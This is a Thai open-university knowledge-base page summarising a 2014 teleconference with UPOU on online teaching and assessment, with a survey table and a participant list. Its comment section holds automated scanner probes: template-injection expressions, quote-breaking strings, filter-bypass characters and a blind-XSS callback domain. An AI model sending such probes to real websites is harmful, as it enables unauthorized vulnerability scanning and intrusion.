เว็บไซต์การจัดการความรู้ของ มสธ. ยินดีต้อนรับ | Log in | สมัครสมาชิก

ฐานความรู้ มสธ.

 

บันทึกความรู้ร่วมกับสำนักทะเบียน

 

บันทึกความรู้เรื่อง “ทิศทางการเรียนการสอนและการประเมินผลการศึกษาในระบบออนไลน์”

ทิศทางการเรียนการสอนและการประเมินผลการศึกษาในระบบออนไลน์”

 

สำนักทะเบียนและวัดผลมีความตระหนักถึงความสำคัญของพัฒนาการทางเทคโนโลยีสารสนเทศ ที่เกี่ยวข้องและส่งผล
ในการปรับปรุงพัฒนาการจัดการศึกษา รวมทั้งการวัดและประเมินผลการศึกษาในระบบการศึกษาทางไกลของมหาวิทยาลัยสุโขทัยธรรมาธิราช จึงได้ร่วมกับศูนย์ประสานงาน
การประกันคุณภาพการศึกษา จัดโครงการแลกเปลี่ยนเรียนรู้ทางวิชาการผ่านระบบออนไลน์ (
teleconference) เรื่อง ทิศทางการเรียนการสอนและการประเมินผลการศึกษาในระบบออนไลน์ ในวันพุธที่ 26 มีนาคม 2557 เวลา 12.45 – 16.00 น. ณ ห้องประชุม 1607 อาคารส่วนต่อเติม ชั้น 6 ซึ่งเป็นโครงการร่วมมือระหว่างมหาวิทยาลัยสุโขทัยธรรมาธิราชและมหาวิทยาลัยเปิดแห่งฟิลิปปินส์ (UPOU) เพื่อแลกเปลี่ยนเรียนรู้ในเรื่องการจัดการเรียนการสอนและการประเมินผลการศึกษาในระบบออนไลน์ เป็นการเตรียมความพร้อมเข้าสู่ประชาคมอาเซียน และเพื่อตอบสนองต่อวัตถุประสงค์ของมหาวิทยาลัยและพันธกิจของสำนักทะเบียนและวัดผล ตามวัตถุประสงค์ของการจัดโครงการดังต่อไปนี้

1.   เพื่อให้ผู้เข้าร่วมโครงการมีโอกาสแลกเปลี่ยนเรียนรู้ในเรื่องการจัดการเรียนการสอนและการประเมินผลการศึกษาในระบบออนไลน์

2.   เพื่อให้ผู้เข้าร่วมโครงการมีโอกาสสร้างเครือข่ายทางวิชาการกับผู้เชี่ยวชาญ ในการจัดการเรียนการสอนระบบออนไลน์ของมหาวิทยาลัยเปิดแห่งฟิลิปปินส์

สรุปเนื้อหาสำคัญในการแลกเปลี่ยนเรียนรู้

 

ช่วงที่ 1 การแสดงวิสัยทัศน์ของอธิการบดีมหาวิทยาลัยสุโขทัยธรรมาธิราช และอธิการบดี UPOU

 

          รองศาสตราจารย์ ดร. นายแพทย์ชัยเลิศ พิชิตพรชัย (อธิการบดี มสธ.) กล่าวเปิดและแสดงวิสัยทัศน์เรื่อง การเรียนการสอนและการประเมินผลในระบบออนไลน์ของ มหาวิทยาลัยสุโขทัยธรรมาธิราช
โดยมีใจความดังนี้

มโนทัศน์ทางการศึกษาประกอบด้วย 3 ส่วนสำคัญ คือ ผลลัพธ์การเรียนรู้ กระบวนการเรียนรู้ และการประเมินผลการเรียนรู้ โดยผลลัพธ์การเรียนรู้ที่มีประสิทธิผล มาจากกระบวนการจัดการเรียนรู้ที่มีประสิทธิภาพมุ่งเน้นผู้เรียนเป็นสำคัญ รวมทั้งการมีกระบวนการประเมินผลที่เป็นมาตรฐาน มีความครอบคลุมทั้งการประเมินระหว่างเรียน และการประเมินหลังเรียน โดยทั้ง 3 ส่วนจะต้องมีความสอดคล้องและครอบคลุมวัตถุประสงค์ทางการศึกษา 3 ด้าน ประกอบด้วย พุทธิสัย ทักษะพิสัย และจิตพิสัย ทั้งนี้ ในประเด็นทักษะพิสัย และจิตพิสัย สำหรับการจัดการเรียนการสอนของมหาวิทยาลัยในระบบเปิดอย่างมหาวิทยาลัยสุโขทัย-
ธรรมาธิราช ค่อนข้างมีความยากลำบากเนื่องจากเป็นระบบการเรียนการสอนทางไกล ผู้สอนและผู้เรียนมีโอกาสได้ปฏิสัมพันธ์กันน้อย จึงเป็นประเด็นสำคัญว่าจะจัดการเรียนการสอนและการประเมินผลอย่างไรให้สอดคล้องครอบคลุมกับวัตถุประสงค์ทางการศึกษาทั้ง 3 ด้านที่ควรจะเป็น

ในปัจจุบัน เทคโนโลยีสารสนเทศเข้ามามีบทบาทสำคัญอย่างมากต่อการดำเนินชีวิต การนำเทคโนโลยีสารสนเทศเข้ามาช่วยในการพัฒนากระบวนการจัดการเรียนรู้ และการประเมินผลสำหรับการเรียนการสอนทางไกลจึงมีส่วนช่วยให้การดำเนินการดังกล่าวสอดคล้อง ครอบคลุมตามวัตถุประสงค์ทางการศึกษาทั้งสามด้านมากยิ่งขึ้น ทั้งนี้จะต้องมีปัจจัยนำเข้า (input) ประกอบด้วยอุปกรณ์คอมพิวเตอร์ ที่มีประสิทธิภาพ ผ่านกระบวนการ (process) นำมาสู่ผลผลิต (output) ซึ่งเป็นส่วนที่สะท้อนประสิทธิภาพของปัจจัยนำเข้า แต่การนำเทคโนโลยีสารสนเทศมาใช้จัดการเรียนการสอน และการประเมินผลทางไกล มีข้อพึงระวังอย่างยิ่งในประเด็นเกี่ยวกับความซื่อสัตย์ของนักศึกษา ควรที่จะมีการควบคุมให้เป็นมาตรฐาน เพื่อให้การดำเนินการเป็นที่ยอมรับ และมีความน่าเชื่อถือมากยิ่งขึ้น

Prof. Grace J. Alfonso, Ph.D. (อธิการบดีUPOU) กล่าวถึงกรอบการเรียนการสอนในยุคดิจิตอล ซึ่งเป็นยุคที่เทคโนโลยีสารสนเทศเป็นการบูรณาการ 3 ส่วนคือ สื่อ การศึกษา และชุมชนแห่งการเรียนรู้ โดยเฉพาะอย่างยิ่งสำหรับระบบการเรียนการสอนแบบเปิด กรอบการจัดการศึกษา
ในรูปแบบดังกล่าว เรียกว่า
OPEN AND DISTANCE
e-LEARNING (ODeL) ประกอบด้วย 3 ส่วนสำคัญ คือ
การเรียนรู้แบบเปิด การศึกษาทางไกล และการใช้
e-Lerning เข้ามาผสมผสาน โดยคำนึงถึงความเท่าเทียมในการเข้าถึง การแบ่งปันทรัพยากร การให้ผู้เรียนเป็นศูนย์กลาง ความยืดหยุ่น การเรียนรู้ผ่านกิจกรรม การมีปฏิสัมพันธ์ การความสะดวกในการเข้าถึง และการเชื่อมโยงเครือข่าย ซึ่งส่วนต่าง ๆ เหล่านี้จะต้องเป็นไปอย่างยอดเยี่ยม มีความเป็นวิชาการ อิสระ คำนึงถึงความเป็นมนุษย์ แสดงถึงสติปัญญาขั้นสูง เข้าถึงได้จำนวนมาก ผสมผสานวัฒนธรรม มีความหลากหลาย มีความเป็นประชาธิปไตย และบริการสังคม การผสมผสานดังกล่าวจะนำมาซึ่งการเปลี่ยนผ่านทางสังคม

การสอนและการเรียนรู้ทางไกลต้องสามารถเข้าถึงได้ทุกระดับ เป็นความรู้ใหม่ และเป็นการส่งผ่านการเรียนรู้และการจัดการเรียนการสอน โดยชุดของกรอบ ODel เป็นการสร้างชุมชนแห่งการเรียนรู้และ
จะเป็นกระแสหลักของการศึกษาระดับอุดมศึกษาโดย ทั้งนี้มหาวิทยาลัยในระบบเปิดจะต้องมีความต่อเนื่องในการปฏิบัติ ให้มีบทบาทเป็นที่ยอมรับและมีการประเมินผู้เรียนที่เหมาะสมและมีความน่าเชื่อถือ บทบาทของครูในการจัดการเรียนการสอนออนไลน์ จะต้องเป็นผู้ออกแบบการจัดการเรียนการสอน มีความชำนาญในการใช้เทคโนโลยีสารสนเทศ ส่วนบทบาทของผู้เรียน จะต้องเป็นผู้ประเมิน ผู้ตรวจสอบ โดยมีบทบาทในการประเมินตนเองจากผลงานที่ปรากฏ
ส่วนมหาวิทยาลัยจะต้องมีบทบาทในการปรับสมดุลระหว่างกระบวนการจัดการเรียนการสอนและการประเมิน แต่ยังคงคุณค่าของความเป็นอิสระ
ทางวิชาการ

ช่วงที่ 2 การแลกเปลี่ยนเรียนรู้โดยตัวแทนคณาจารย์มหาวิทยาลัยสุโขทัยธรรมาธิราช

 

และคณาจารย์จาก UPOU

          ตัวแทนคณาจารย์จากสองมหาวิทยาลัยร่วมแลกเปลี่ยนเรียนรู้ในเรื่อง การจัดการเรียนการสอนและการประเมินผลการศึกษาในระบบออนไลน์ โดยมีอาจารย์ ดร.กุญชร เจือตี๋ เป็นผู้ดำเนินรายการสาระของการแลกเปลี่ยนเรียนรู้มีดังต่อไปนี้

รองศาสตราจารย์ ดร.อลิสา วานิชดี (ตัวแทนจาก มสธ.) และ Mr.Trevor John Smith แลกเปลี่ยนประสบการณ์ในการจัดการเรียนการสอนและการประเมินผลผ่านระบบออนไลน์ มีใจความว่า หลักสูตรที่สอนมีจำนวนนักศึกษาเป็นจำนวนมากในขณะที่จำนวนคณาจารย์มีจำกัด ระบบการเรียนโดยทั่วไปนักศึกษาจะต้องเรียนรู้และแสวงหาประสบการณ์ต่าง ๆ ด้วยตนเอง โดยเปิดโอกาสให้มีช่องทางอื่นอยู่บ้าง เช่น การนัดพบอาจารย์เป็นรายบุคคล การพูดคุยทางโทรศัพท์ ส่วนชุดวิชาที่มีการจัดการเรียนการสอนออนไลน์นั้น ขณะนี้ยังมีจำนวนไม่มาก และค่อนข้างเป็นภาระงานที่เพิ่มขึ้น เนื่องจากจะต้องสื่อสารกับนักศึกษา มอบหมายงาน ตรวจผลงาน และติดตามงานของนักศึกษา แต่เมื่อเทียบกับประสิทธิผลในการจัดการเรียนการสอนแล้วก็นับได้ว่าคุ้มค่ามาก เนื่องจากการจัดการเรียนการสอนดังกล่าว เอื้อให้ติดต่อสื่อสารกับนักศึกษาได้หลายรูปแบบ หลายช่องทางมากยิ่งขึ้น เช่น การจัดทำคลิปวิดีโอ ไฟล์เสียง รูปภาพ ช่วยให้สามารถประเมินระหว่างเรียนได้หลากหลาย และครอบคลุมคุณลักษณะของนักศึกษามากยิ่งขึ้น รวมทั้งเป็นการอำนวยความสะดวกแก่นักศึกษาให้สามารถเข้าถึงแหล่งเรียนรู้ได้ทุกที่ทุกเวลา

Asst. Prof. Consuelo dL. Habito, Ph.D. (ตัวแทนจาก UPOU) กล่าวถึงการพัฒนาเครื่องมือวัดของวิชา ENRM 223 โดยผู้เชี่ยวชาญด้านเนื้อหา ซึ่งประกอบด้วยการพัฒนาข้อคำถามและการประเมินเชิงคุณภาพและเชิงปริมาณ เพื่อให้การประเมินการเรียนการสอนของวิชา ENRM 223 เป็นไปอย่างถูกต้อง ครอบคลุมและสอดคล้องกับวัตถุประสงค์ของรายวิชามากที่สุด โดยผู้เชี่ยวชาญด้านเนื้อหา 6 คน ตรวจสอบข้อคำถาม 145 ข้อ พิจารณาค่าดัชนีความสอดคล้องของเนื้อหา (IOC) ผู้ที่เห็นด้วยในแต่ละข้อคำถามให้ 1 คะแนน ผู้ที่ไม่แน่ใจ ให้ 0 คะแนน ส่วนผู้ที่ไม่เห็นด้วยให้ -1 คะแนน ดัชนีดังกล่าวควรมีค่าไม่น้อยกว่า 0.5 หากต่ำกว่านี้จะเป็นข้อคำถามที่ไม่ผ่านเกณฑ์การพิจารณา ผลการวิเคราะห์ค่า IOC พบว่า มีจำนวน
ข้อคำถามร้อยละ
96.6 ผ่านเกณฑ์การพิจารณา ผลการประเมินข้อคำถามดังกล่าวเป็นประโยชน์อย่างยิ่งต่อรายวิชา ทำให้ได้รับทราบผลสะท้อนคิดจากผู้เชี่ยวชาญเพื่อนำมาปรับปรุงคุณภาพของข้อคำถามให้มีความถูกต้อง เหมาะสมยิ่งขึ้น

 

อาจารย์ ดร.ขจิตพรรณ กฤตพลวิมาน (ตัวแทนจาก มสธ.) กล่าวถึงระบบการเรียนรู้ผ่านอิเล็กทรอนิกส์ของ
การจัดการเรียนการสอนในสาขาวิชาวิทยาศาสตร์และเทคโนโลยีว่า สาขาวิชาที่สอนประกอบด้วยชุดวิชาทั่วไปและชุดวิชาที่ต้องอบรมเข้ม โดยชุดวิชาทั่วไป จะมีบทเรียนออนไลน์และกิจกรรมการเข้าร่วมสัมมนา ส่วนชุดวิชาที่ต้องอบรมเข้มจะเพิ่มขั้นตอน
ในการอบรมเข้มด้วย รูปแบบการจัดกิจกรรมผ่านทางระบบออนไลน์ จะแตกต่างกันโดยชุดวิชาทั่วไป ในแต่ละโมดูลจะประกอบด้วยประมวลรายวิชา แนวการศึกษา และเอกสารการสอน ส่วนชุดวิชาที่มี
การอบรมเข้ม ในแต่ละโมดูลประกอบด้วยกิจกรรมก่อนเรียน หลังเรียน เนื้อหาสาระ และกิจกรรมที่มอบหมายในแต่ละสัปดาห์ และมีช่องทางให้นักศึกษาสามารถสอบถามปัญหากับคณาจารย์ได้ ส่วนการประเมินและการตัดสินผลการเรียนผ่าน E-Learning เป็นการให้คะแนนผ่านกิจกรรมสำหรับชุดวิชาทั่วไปจะมีคะแนนเต็ม 25 คะแนน ส่วนชุดวิชาที่ต้องอบรมเข้ม มีคะแนนเต็มในส่วนนี้ 20 คะแนน ส่วนหนึ่งเป็นกิจกรรมถามตอบ กรณีศึกษา การวาดแผนภาพไดอะแกรม ส่วนการประเมินทักษะในเชิงเทคนิค ประกอบด้วยการเขียนโปรแกรม การวิเคราะห์ผลโปรแกรม ให้คะแนนผ่านทางการอภิปรายในกลุ่ม การตรวจสอบผลงานจากรายงาน และอัพโหลดผ่านระบบ E-Learning

               ทั้งนี้ การดำเนินการดังกล่าวมีข้อจำกัดบางประการ กล่าวคือ เป็นการยากที่จะตรวจสอบการคัดลอกผลงาน เนื่องจากเป็นเพียงการตรวจผลงานที่เสร็จสมบูรณ์แล้ว ผู้สอนไม่เห็นกระบวนการในการทำงานของนักศึกษา และยังขาดโปรแกรม และอุปกรณ์ประกอบใช้ในการสาธิตผ่านระบบออนไลน์ที่มีประสิทธิภาพ ขาดการสนับสนุนการฝึกอบรมทักษะการใช้บทเรียนออนไลน์ในเชิงเทคนิค และเป็นการยากที่จะประเมินทักษะการปฏิบัติของนักศึกษาที่สัมพันธ์กับแต่ละชุดวิชา ผู้สอนสามารถตรวจสอบได้เพียงผลงานที่นักศึกษาส่งงานผ่านทางระบบออนไลน์เท่านั้น แต่เมื่อพิจารณาเปรียบเทียบกับการเรียนรู้แบบพบหน้ากันแม้จะเป็นทางแก้ไขปัญหาดังกล่าวได้แต่ก็ไม่ใช่วิธีการที่ดีที่สุด เนื่องจากการฝึกปฏิบัติเป็นสิ่งที่ต้องใช้เวลา และการศึกษาในเชิงลึก สิ่งที่ควรได้รับการสนับสนุนให้มีความสมบูรณ์ยิ่งขึ้น คือ ระบบสนับสนุนที่มีประสิทธิภาพสูงในการปฏิสัมพันธ์ผ่านบทเรียนออนไลน์ในเวลาเดียวกันระหว่างอาจารย์และนักศึกษา และโปรแกรมที่มีประสิทธิภาพสูงในการวิเคราะห์ประมวลผลในแต่ละกิจกรรมที่สามารถใช้ได้พร้อมกัน รวมทั้งโปรแกรมถูกลิขสิทธิ์ที่มีศักยภาพในการสนับสนุนการเรียนการสอนผ่านระบบ
E-Learning อย่างสมบูรณ์

Asst. Prof. Joane V. Serrano, Ph.D. (ตัวแทนจาก UPOU) ร่วมแลกเปลี่ยนเรียนรู้เกี่ยวกับการยกระดับคุณภาพการประเมินผู้เรียน รายวิชา ENRM 221 ว่า UPOU เห็นความสำคัญของการจัดการเรียนการสอนผ่านระบบออนไลน์ที่จะต้องให้นักศึกษาเป็นศูนย์กลางการเรียนรู้ ให้โอกาสนักศึกษาได้ร่วมแบ่งปันแลกเปลี่ยนความรู้กัน รวมทั้งการเป็นศูนย์กลางองค์ความรู้ กล่าวคือ เปิดโอกาสให้มีการคิดเชิงวิพากษ์เพื่อสร้างประสบการณ์การเรียนรู้ให้แก่นักศึกษา รวมทั้งการสร้างรูปแบบการประเมินที่เป็นไปเพื่อการเรียนรู้ โดยครู เพื่อน และผู้เชี่ยวชาญจากภายนอก ได้มีการปรับปรุงรายวิชาขึ้นเพื่อดำเนินการให้เป็นไปตามการดำเนินงานดังกล่าว โดยมีการเปลี่ยนแปลงวิธีการประเมินและการให้เกรด โดยการแยกให้เกรดแต่ละภาระงาน โดยมีการกำหนดเกณฑ์การให้คะแนนแบบรูบริคส์ เพื่อให้นักศึกษาได้ทราบเกณฑ์ที่ตนจะต้องประพฤติ และเรียนรู้ให้ได้ตามนั้น ส่วนการดำเนินการในชั้นต่อไป ทั้งการกำหนดวัตถุประสงค์ เนื้อหา และการประเมินจะต้องปรับให้สอดคล้องกับทักษะที่ควรมีในศตวรรษที่ 21 ได้แก่ ความคิดเชิงวิพากษ์ ทักษะการแก้ปัญหา ความคิดสร้างสรรค์ ความสามารถในการสื่อสาร ทักษะในการใช้สารสนเทศและสื่อในเชิงเทคนิค

ความพึงพอใจต่อการเข้าร่วมกิจกรรม

ผู้เข้าร่วมกิจกรรม จำนวน 30 คน ตอบแบบสอบถามทั้งสิ้น 14 คน คิดเป็นร้อยละ 43.75 ของจำนวนผู้เข้าร่วมทั้งหมด แบ่งเป็นอาจารย์สาขาวิชาวิทยาศาสตร์และเทคโนโลยีจำนวน 3 คน สาขาวิชาวิทยาการจัดการจำนวน 1 คน สาขาวิชานิเทศศาสตร์จำนวน 1 คน สาขาศิลปศาสตร์จำนวน 1 คน สำนักเทคโนโลยีการศึกษาจำนวน 1 คน สำนักทะเบียนและวัดผลจำนวน 5 คน และนักวิชาการศึกษาจำนวน 2 คน ผลวิเคราะห์มีรายละเอียดดังตารางที่ 1

ตารางที่ 1 ความพึงพอใจต่อการเข้าร่วมสัมมนา

ที่

รายการประเมิน

ค่าเฉลี่ย

ส่วนเบี่ยงเบนมาตรฐาน

ระดับความพึงพอใจ

1

ความสะดวกในการลงทะเบียนเข้าร่วมการสัมมนาทางออนไลน์

4.50

0.65

มาก

2

ความสะดวกในการลงทะเบียนเพื่อรับเอกสาร

4.64

0.49

มากที่สุด

3

ความเหมาะสมของรูปแบบการจัดสัมมนา

4.43

0.54

มาก

4

ความเหมาะสมของระยะเวลาที่ใช้

4.14

0.77

มาก

5

ประสิทธิภาพของระบบออนไลน์ในการสัมมนา

3.93

0.92

มาก

6

โอกาสในการแลกเปลี่ยนเรียนรู้ขณะมีการสัมมนา

3.86

0.77

มาก

7

ความรู้ที่ได้รับจากการเข้าร่วมสัมมนา

4.21

0.80

มาก

8

การมีแนวทางในการประยุกต์ใช้ความรู้ที่ได้รับกับงานประจำ

3.93

0.92

มาก

9

โอกาสในการสร้างเครือข่ายทางวิชาการกับผู้เชี่ยวชาญของ UPOU

4.14

0.95

มาก

10

ความพึงพอใจในภาพรวม

4.36

0.63

มาก

จากตารางสรุปได้ว่า ผู้เข้าร่วมสัมมนามีความพึงพอใจต่อการเข้าร่วมสัมมนาในภาพรวมอยู่ในระดับมาก(ค่าเฉลี่ย 4.36) และมีความพึงพอใจในเรื่องความสะดวกในการลงทะเบียนเพื่อรับเอกสารอยู่ระดับมากที่สุด (ค่าเฉลี่ย 4.64) รองลงมาคือ ความสะดวกในการลงทะเบียนเข้าร่วมการสัมมนาทางออนไลน์อยู่ในระดับมาก (ค่าเฉลี่ย 4.50) ความเหมาะสมของรูปแบบการจัดสัมมนาอยู่ในระดับมาก (ค่าเฉลี่ย 4.43) และความรู้ที่ได้รับจากการเข้าร่วมสัมมนาอยู่ในระดับมาก (ค่าเฉลี่ย 4.21) ตามลำดับ

 

ข้อคิดเห็นและข้อเสนอแนะจากผู้เข้าร่วมกิจกรรม

1. ข้อดีในการจัดกิจกรรม

          1) ทำให้มองภาพการจัดการเรียนการสอนผ่านระบบออนไลน์ชัดเจนขึ้น

          2) ทำให้บุคลากรใน มสธ. มีความตื่นตัวในการพัฒนาทักษะทางภาษาอังกฤษมากขึ้น

          3) ทำให้บุคลากรใน มสธ. ได้ทำงานร่วมกันหลายหน่วยงาน ทำให้เกิดการสานสัมพันธ์อันดี (ความถี่ 2)

          4) ได้ประสบการณ์และได้แลกเปลี่ยนเรียนรู้ในการจัดการเรียนการสอนออนไลน์กับต่างประเทศ (ความถี่ 4)

2. ข้อควรปรับปรุงในการจัดกิจกรรม

           1) การประชาสัมพันธ์ข่าวสารการจัดสัมมนาให้หลากหลายช่องทางมากขึ้น

           2) ควรมีการประสานงานเกี่ยวกับระบบการติดต่อสื่อสารกับทางฟิลิปปินส์ให้เข้าใจตรงกันว่าจะมีการถ่ายทอดภาพอย่างไร (ความถี่ 4)

           3) รูปแบบการจัดสัมมนาเป็นการบรรยายมากเกิน ควรสร้างบรรยากาศให้เป็นการแลกเปลี่ยนรู้ให้มากกว่านี้ เช่น มีการกำหนดประเด็นแล้วมีการอภิปรายกัน (ความถี่ 2)

           4) ไม่จำเป็นต้องเน้นจำนวนผู้เข้าร่วมมาก แต่ขอให้ทุกคนมีส่วนร่วมในการแลกเปลี่ยนเรียนรู้อย่างแท้จริง โดยสื่อสารผสมผสานระหว่างภาษาไทย และภาษาอังกฤษอย่างเป็นธรรมชาติ

3. ข้อเสนอแนะอื่นๆ

           1) ควรมีการบริหารจัดการให้มีผู้เข้าร่วมอย่างครอบคลุม ทั่วถึงจากหลากหลายสาขาวิชาหลายหน่วยงาน

           2) ควรมีการจัดกิจกรรมในรูปแบบนี้กับประเทศอื่นด้วย (ความถี่ 3)

           3) การจัดงานในครั้งต่อไป ไม่จำเป็นต้องเป็นประเด็นเดิม อาจต่อยอดประเด็นเดิม หรือปรับเปลี่ยนประเด็นให้เหมาะสม สอดคล้องกับกระแสสังคม เพื่อให้ประเด็นมีความทันสมัย น่าสนใจ ชวนให้ติดตามเข้าร่วม

 

ข้อเสนอแนะเชิงนโยบาย

 

          จากผลสรุปสาระสำคัญในการจัดกิจกรรมแลกเปลี่ยนเรียนรู้ผ่านระบบออนไลน์ เรื่อง ทิศทางการ

เรียนการสอนและการประเมินผลการศึกษาในระบบออนไลน์ที่ได้นำเสนอแล้วนั้น คณะทำงานได้พิจารณาสาระสำคัญที่ได้จากการจัดงานและมีข้อเสนอแนะเชิงนโยบาย ดังต่อไปนี้

 

1.    มหาวิทยาลัยควรมีแผนการดำเนินงานในการสนับสนุน การจัดการเรียนการสอนและการประเมินผลการศึกษาในระบบออนไลน์ที่ชัดเจน ในด้านต่าง ๆ ดังต่อไปนี้

             1.1 ด้านบุคลากร ควรมีแนวทางในการสร้างความรู้ ความเข้าใจแก่บุคลากร ทั้งอาจารย์ และเจ้าหน้าที่ ในการจัดการเรียนการสอน และการประเมินผลการศึกษาในระบบออนไลน์ มีการสนับสนุนส่งเสริมโดยมีเวทีให้คณาจารย์ และเจ้าหน้าที่ที่ดำเนินการในด้านนี้ ได้ประกวด เผยแพร่ผลงาน มีรางวัลตอบแทน
เพื่อเป็นแรงจูงใจให้บุคลากร สนใจนำระบบออนไลน์มาใช้ในการพัฒนางานของตนอย่างเห็นผลเป็นรูปธรรม

             1.2 ด้านวัสดุอุปกรณ์ ควรมีนโยบายในการปรับปรุงพัฒนาโปรแกรมออนไลน์ของมหาวิทยาลัย รวมทั้งระบบสนับสนุนที่เกี่ยวข้อง ให้รองรับการทำงานที่หลากหลาย เช่น โปรแกรมสนับสนุนการสาธิต
ผ่านระบบออนไลน์ที่มีประสิทธิภาพ ระบบสนับสนุนที่มีประสิทธิภาพสูงในการปฏิสัมพันธ์ผ่านบทเรียนออนไลน์ในเวลาเดียวกันระหว่างอาจารย์และนักศึกษา โปรแกรมที่มีประสิทธิภาพสูงในการวิเคราะห์ประมวลผล

           2. ควรมีการประเมินผลการดำเนินการจัดการเรียนการสอนผ่านระบบออนไลน์ ทั้งในด้านจุดแข็ง จุดอ่อน โอกาส และอุปสรรคในการดำเนินการ เพื่อให้ได้ข้อมูลในการปรับปรุง พัฒนาระบบการเรียนการสอนออนไลน์ ให้มีความทันสมัย สอดคล้องกับความต้องการของคณาจารย์และนักศึกษา

           3. ควรให้การสนับสนุนกิจกรรมแลกเปลี่ยนเรียนรู้ผ่านระบบออนไลน์ ร่วมกับต่างประเทศ ดังเช่นการจัดกิจกรรมในครั้งนี้ เพื่อเป็นการเปิดโลกทัศน์ เรียนรู้พัฒนาการในการดำเนินงานของประเทศอื่น
และสร้างความตื่นตัวให้แก่คณาจารย์ และเจ้าหน้าที่ของมหาวิทยาลัย ในการพัฒนาศักยภาพของตน รวมทั้งควรมีโครงการให้คณาจารย์และเจ้าหน้าที่ ได้มีโอกาสฝึกทักษะการสื่อสารภาษาอังกฤษในเชิงวิชาการ เพื่อเพิ่มสมรรถนะทางการใช้ภาษาของบุคลากรให้สามารถแลกเปลี่ยนเรียนรู้กับต่างประเทศได้อย่างมีประสิทธิภาพ

ภาคผนวก


รายชื่อวิทยากรและผู้เข้าร่วมโครงการแลกเปลี่ยนเรียนรู้ผ่านระบบออนไลน์

เรื่อง ทิศทางการเรียนการสอนและการประเมินผลการศึกษาในระบบออนไลน์

วันพุธที่ 26 มีนาคม 2557 เวลา 12.45 – 16.00 น.

ณ ห้องประชุม 1607 อาคารส่วนต่อเติม ชั้น 6 มหาวิทยาลัยสุโขทัยธรรมาธิราช

ลำดับที่

หน่วยงาน

ชื่อ-สกุล

วิทยากร

1

อธิการบดี

รองศาสตราจารย์ ดร.นายแพทย์ชัยเลิศ พิชิตพรชัย

2

สาขาวิชาศิลปศาสตร์

รองศาสตราจารย์ ดร.อลิสา วานิชดี

3

สาขาวิชาวิทยาศาสตร์และเทคโนโลยี

อาจารย์ ดร.ขจิตพรรณ กฤตพลวิมาน

4

สำนักทะเบียนและวัดผล

อาจารย์ ดร.กุญชร เจือตี๋

ผู้เข้าร่วม

1

ศูนย์ประสานงานการประกันคุณภาพการศึกษา

นาง ณ ฤดี ฐิติธราดล

2

สาขาวิชาวิทยาการจัดการ

รองศาสตราจารย์ กัลยาณี กิตติจิตต์

3

สาขาวิชาวิทยาศาสตร์และเทคโนโลยี

รองศาสตราจารย์ ศุภณี เรียบเลิศหิรัญ

4

สาขาวิชาวิทยาศาสตร์และเทคโนโลยี

ดร.แววบุญ วลีธรชีพสวัสดิ์

5

สำนักทะเบียนและวัดผล

รองศาสตราจารย์ ดร.สิริรัตน์ วิภาสศิลป์

6

สำนักทะเบียนและวัดผล

อาจารย์ณรงค์ ทีปประชัย

7

สำนักทะเบียนและวัดผล

อาจารย์ปิยนาฏ สิทธิฤทธิ์

8

สำนักทะเบียนและวัดผล

อาจารย์วินิตา แก้วเกื้อ

9

สำนักทะเบียนและวัดผล

อาจารย์ ดร.ศศิธร บัวทอง

10

สำนักทะเบียนและวัดผล

อาจารย์ศจี จิระโร

11

สำนักทะเบียนและวัดผล

รองศาสตราจารย์ ดร.สุภมาส อังศุโชติ

12

สำนักทะเบียนและวัดผล

นางสาวสุธี เข่งเงิน

13

สำนักทะเบียนและวัดผล

นางสาวพิชพันธุ์ สาริยันต์

14

สำนักทะเบียนและวัดผล

นายสรศักดิ์ เฉลิมลักษณ์

15

สำนักทะเบียนและวัดผล

นายปวลัย ปวรสูต

16

สาขาวิชานิเทศศาสตร์

รองศาสตราจารย์จันทนา ทองประยูร

17

สำนักเทคโนโลยีการศึกษา

รองศาสตราจารย์นภาภรณ์ ปาลวัฒน์วิไชย

18

สำนักเทคโนโลยีการศึกษา

ผู้ช่วยศาสตราจารย์อภิญญา สนกนก

19

สำนักเทคโนโลยีการศึกษา

กิตติภัทร์ มลิพันธ์

20

สำนักเทคโนโลยีการศึกษา

นิพนธ์ ยุวการุณย์

21

สำนักเทคโนโลยีการศึกษา

นายทำนอง พิณทอง

22

สำนักเทคโนโลยีการศึกษา

นายเพิ่มสวัสดิ์ แย้มเสนาะ

23

สำนักเทคโนโลยีการศึกษา

นายเชาวรัตน์ แจ่มหล้า

24

สำนักเทคโนโลยีการศึกษา

นายสิงหราช สังข์อยุทธ์

25

สำนักเทคโนโลยีการศึกษา

นายสุเมธ หวังพิทักษ์

26

สำนักเทคโนโลยีการศึกษา

นายยงยุทธ ดวงแก้ว

27

สำนักคอมพิวเตอร์

นายมนัสว์ กงภูธร

28

สำนักคอมพิวเตอร์

นายอภิวัฒน์ ใจช่วง

29

สำนักคอมพิวเตอร์

นายจุฑา พิทักษ์พงศ์ไพศาล

30

วิเทศสัมพันธ์

นางรัตน์ทิพย์ ผูกเกษร

Share |                             แสดงความเห็น โปรด Log in
bfg1195<s1﹥s2ʺs3ʹhjl1195
CpjJwWHV
7/20/2023
555
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
7/20/2023
555
CpjJwWHV
7/20/2023
555
CpjJwWHV'"()&%
7/20/2023
555'"()&%
CpjJwWHV
7/20/2023
555
CpjJwWHV9124913
7/20/2023
555
bfg7951<s1﹥s2ʺs3ʹhjl7951
7/20/2023
555
bfgx10049��z1��z2a�bcxhjl10049
7/20/2023
bfgx2632��z1��z2a�bcxhjl2632
CpjJwWHV
7/20/2023
<%={{={@{#{${dfb}}%>
CpjJwWHV
7/20/2023
555
<%={{={@{#{${dfb}}%>
7/20/2023
555
CpjJwWHV
7/20/2023
555
CpjJwWHV
7/20/2023
CpjJwWHV
7/20/2023
dfb[[${98991*97996}]]xca
CpjJwWHV
7/20/2023
5559955122
CpjJwWHV
7/20/2023
555

7/20/2023
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
CpjJwWHV
7/20/2023
dfb__${98991*97996}__::.x
CpjJwWHV
7/20/2023
555
dfb[[${98991*97996}]]xca
7/20/2023
555
dfb__${98991*97996}__::.x
7/20/2023
555
dfb{{98991*97996}}xca
7/20/2023
555
CpjJwWHV
7/20/2023
dfb{{98991*97996}}xca
CpjJwWHV
7/20/2023
555
CpjJwWHV
7/20/2023
555
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
7/20/2023
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
CpjJwWHV
7/20/2023
555
CpjJwWHV
7/20/2023
555
CpjJwWHV
7/20/2023
555
bxss.me
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
CpjJwWHV
7/19/2023
555
